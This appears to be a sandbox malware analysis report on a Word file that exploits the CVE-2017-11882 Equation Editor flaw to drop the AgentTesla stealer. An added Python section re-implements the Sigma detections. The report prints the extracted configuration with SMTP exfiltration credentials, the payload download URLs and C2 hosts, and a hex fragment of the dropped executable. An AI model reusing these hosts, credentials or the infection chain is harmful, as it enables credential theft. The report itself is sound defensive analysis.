Analysis Report Pending Orders Statement -40064778.doc

Overview

General Information

Sample Name:Pending Orders Statement -40064778.doc
Analysis ID:345163
MD5:47c45cbbc8fa7c9c62efdfcadee09e99
SHA1:e44f1f16be00551108ece175186d84ce6432a177
SHA256:1bb9591f1ed79d19e77dd9e9b0c05ee37aa36c317e93e1d275df2a801c05afe6
Tags:doc

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Installs a global keyboard hook
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2492 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • poiuytrewsdfghjklmnbvcx.exe (PID: 2572 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)
      • poiuytrewsdfghjklmnbvcx.exe (PID: 2332 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)
      • poiuytrewsdfghjklmnbvcx.exe (PID: 2712 cmdline: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe MD5: D0154FB70ABD786136AE9F68F285541C)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "6a5HVZW", "URL: ": "https://xWUrFiDn0aBmFXBFM.net", "To: ": "edubrazil4040@longjohn.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "7piz2PrTT", "From: ": "edubrazil4040@longjohn.icu"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(6 further entries collapsed in the original report)

Unpacked PEs

Source | Rule | Description | Author
6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, CommandLine: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, NewProcessName: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, OriginalFileName: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2492, ProcessCommandLine: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe, ProcessId: 2572
Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 172.111.202.41, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2492, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2492, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe
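The three Sigma hits above all key on EQNEDT32.EXE itself, because the Equation Editor is started through COM and its parent is not the Office host that loaded the document. The following is an added example, not Joe Sandbox's code and not the Sigma rules' own YAML: a Python re-implementation of the three detections run over constructed Sysmon-style events that mirror the report's process tree and the three events quoted above. The explorer.exe parent of WINWORD.EXE and the svchost.exe parent of EQNEDT32.EXE are assumptions, not taken from the report. It also goes beyond the rules by walking parent PIDs, so that the dropper's own children (PIDs 2332 and 2712), which are not direct children of EQNEDT32.EXE, are still tied back to the Equation Editor.

```python
"""Added example (not Joe Sandbox or Sigma project code): the three EQNEDT32.EXE
detections from the report re-implemented over constructed Sysmon-style events."""
from dataclasses import dataclass
import ntpath

EQNEDT = "eqnedt32.exe"
DROPPER = r"C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe"
EQNEDT_PATH = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WINWORD_PATH = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"


@dataclass
class Event:
    event_id: int               # Sysmon: 1 = process create, 3 = network connect, 11 = file create
    image: str                  # process that produced the event
    process_id: int
    parent_image: str = ""      # EventID 1 only
    parent_process_id: int = 0  # EventID 1 only
    dest_ip: str = ""           # EventID 3 only
    dest_port: int = 0          # EventID 3 only
    target_filename: str = ""   # EventID 11 only


# Constructed events mirroring the report's process tree and Sigma hits. The parents of
# WINWORD.EXE (explorer.exe) and EQNEDT32.EXE (svchost.exe, the DCOM launcher) are
# assumptions; PIDs, paths and addresses are the ones the report shows.
SAMPLE_EVENTS = [
    Event(1, WINWORD_PATH, 1464, r"C:\Windows\explorer.exe", 1000),
    Event(1, EQNEDT_PATH, 2492, r"C:\Windows\System32\svchost.exe", 600),
    Event(3, EQNEDT_PATH, 2492, dest_ip="172.111.202.41", dest_port=80),
    Event(11, EQNEDT_PATH, 2492, target_filename=r"C:\Users\user\AppData\Local\Microsoft"
          r"\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe"),
    Event(1, DROPPER, 2572, EQNEDT_PATH, 2492),
    Event(1, DROPPER, 2332, DROPPER, 2572),
    Event(1, DROPPER, 2712, DROPPER, 2572),
    Event(3, DROPPER, 2712, dest_ip="198.54.122.60", dest_port=587),  # SMTP exfil; no EQNEDT32 rule
    Event(11, WINWORD_PATH, 1464, target_filename=r"C:\Users\user\AppData\Local\Microsoft"
          r"\Windows\Temporary Internet Files\Content.Word\~WRS{D19B7C91-551E-40AF-9919-E039C2A6E74E}.tmp"),
]


def _name(path: str) -> str:
    """Case-insensitive file name of a Windows path (Sysmon logs full paths)."""
    return ntpath.basename(path).lower()


def lineage(events, pid):
    """Image names from pid up through its ancestors (child first), following
    ParentProcessId across EventID 1 records; stops where no record exists."""
    by_pid = {e.process_id: e for e in events if e.event_id == 1}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_name(by_pid[pid].image))
        pid = by_pid[pid].parent_process_id
    return chain


def detect(events):
    """(rule title, pid, detail) for every event matching one of the three rules."""
    hits = []
    for e in events:
        if e.event_id == 1 and _name(e.parent_image) == EQNEDT:
            hits.append(("Droppers Exploiting CVE-2017-11882", e.process_id, e.image))
        elif e.event_id == 3 and _name(e.image) == EQNEDT:
            hits.append(("EQNEDT32.EXE connecting to internet", e.process_id,
                         f"{e.dest_ip}:{e.dest_port}"))
        elif e.event_id == 11 and _name(e.image) == EQNEDT:
            hits.append(("File Dropped By EQNEDT32EXE", e.process_id, e.target_filename))
    return hits


def eqnedt_descendants(events):
    """PIDs with EQNEDT32.EXE anywhere in their ancestry, not only direct children."""
    return {e.process_id for e in events
            if e.event_id == 1 and EQNEDT in lineage(events, e.process_id)[1:]}


if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:40} pid={pid} {detail}")
    print("descendants of EQNEDT32.EXE:", sorted(eqnedt_descendants(SAMPLE_EVENTS)))
```

Run against the constructed events, `detect` returns exactly the three hits the report shows (PID 2492 for the network and file events, PID 2572 for the dropper start), while `eqnedt_descendants` additionally returns 2332 and 2712, the two re-launched copies of the dropper whose lineage passes through EQNEDT32.EXE but whose direct parent is the dropper itself.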

              Signature Overview

              AV Detection:

Found malware configuration
Source: poiuytrewsdfghjklmnbvcx.exe.2712.6.memstr | Malware Configuration Extractor: Agenttesla {"Username: ": "6a5HVZW", "URL: ": "https://xWUrFiDn0aBmFXBFM.net", "To: ": "edubrazil4040@longjohn.icu", "ByHost: ": "mail.privateemail.com:587", "Password: ": "7piz2PrTT", "From: ": "edubrazil4040@longjohn.icu"}
Multi AV Scanner detection for submitted file
Source: Pending Orders Statement -40064778.doc | Virustotal: Detection: 41%
Source: Pending Orders Statement -40064778.doc | ReversingLabs: Detection: 47%

              Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

              Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: Symwriter.pdb source: poiuytrewsdfghjklmnbvcx.exe
Source: Binary string: .soap.pdb source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
Source: Binary string: Symwriter.pdb!CorSymWriter_SxS;..\v1.1.4322\diasymreader.dllI00000000-0000-0000-C000-000000000046 source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
Source: global traffic | DNS query: name: cy.kl-re.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 172.111.202.41:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 172.111.202.41:80

              Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: https://xWUrFiDn0aBmFXBFM.net
Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587
Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 27 Jan 2021 18:29:36 GMT
Content-Type: application/x-msdownload
Content-Length: 246784
Connection: keep-alive
Last-Modified: Tue, 26 Jan 2021 23:18:29 GMT
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Nginx-Upstream-Cache-Status: EXPIRED
X-Server-Powered-By: Engintron
Accept-Ranges: bytes
Data Raw (begins with the MZ/PE header of the downloaded executable): 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 a3 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b6 03 00 00 0c 00 00 00 00 00 00 1e d4 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 ac d0 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 d3 03 00 57 00 00 00 00 e0 03 00 e8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 03 00 00 20 00 00 00 b6 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 08 00 00 00 e0 03 00 00 0a 00 00 00 b8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 c2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 03 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 2e 00 00 d0 a4 03 00 0b 00 02 00 04 00 00 06 00 00 00 00 00 00 00 00 50 20 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a ba 72 5c 91 00 70 28 4e 03 00 0a 80 01 00 00 04 73 8a 00 00 0a 80 02 00 00 04 72 60 91 00 70 80 03 00 00 04 73 4f 03 00 0a 80 04 00 00 04 2a a6 72 d3 93 00 70 19 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8b 93 00 70 a2 25 18 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72 e7 93 00 70 a2 25 17 72 8f 93 00 70 a2 25 18 72 8b 93 00 70 a2 25 19 72 eb 93 00 70 a2 28 3c 02 00 0a 2a c6 72 ef 93 00 70 1a 8d 06 00 00 01 25 16 72
Source: global traffic | HTTP traffic detected: GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1 | Host: 193.239.147.103 | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 193.239.147.103
Source: Joe Sandbox View | IP Address: 198.54.122.60
Source: Joe Sandbox View | ASN Name: BLACKNIGHT-ASIE
Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 198.54.122.60:587
Source: global traffic | HTTP traffic detected: GET //power/bo/boobov.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: cy.kl-re.com | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 193.239.147.103 (50 identical entries in the original report)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D19B7C91-551E-40AF-9919-E039C2A6E74E}.tmp
Source: global traffic | HTTP traffic detected: GET //power/bo/boobov.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: cy.kl-re.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /base/9158412CBF14FB744AFA9F0D01F6CDF2.html HTTP/1.1 | Host: 193.239.147.103 | Connection: Keep-Alive
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: cy.kl-re.com
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp | String found in binary or memory: http://193.239.147.103
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106510969.0000000000736000.00000004.00000020.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp | String found in binary or memory: http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.html
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp | String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358448912.0000000008426000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.comy
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349117316.00000000006E0000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: 77EC63BDA74BD0D0E0426DC8F8008506.6.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349067363.000000000066D000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabD
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349067363.000000000066D000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enD
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp | String found in binary or memory: http://duylfM.com
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp | String found in binary or memory: http://mail.privateemail.com
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106847545.0000000002631000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358077916.0000000008090000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2113733519.00000000056C0000.00000002.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2351747130.0000000005C50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp | String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.cr
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://www.chambersign.org1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://www.comsign.co.il/cps0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp | String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp | String found in binary or memory: http://www.sk.ee/cps/0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmp | String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp | String found in binary or memory: http://www.valicert.com/1
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmp | String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmp | String found in binary or memory: https://ca.sia.it/seccli/repository/CPS/
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0
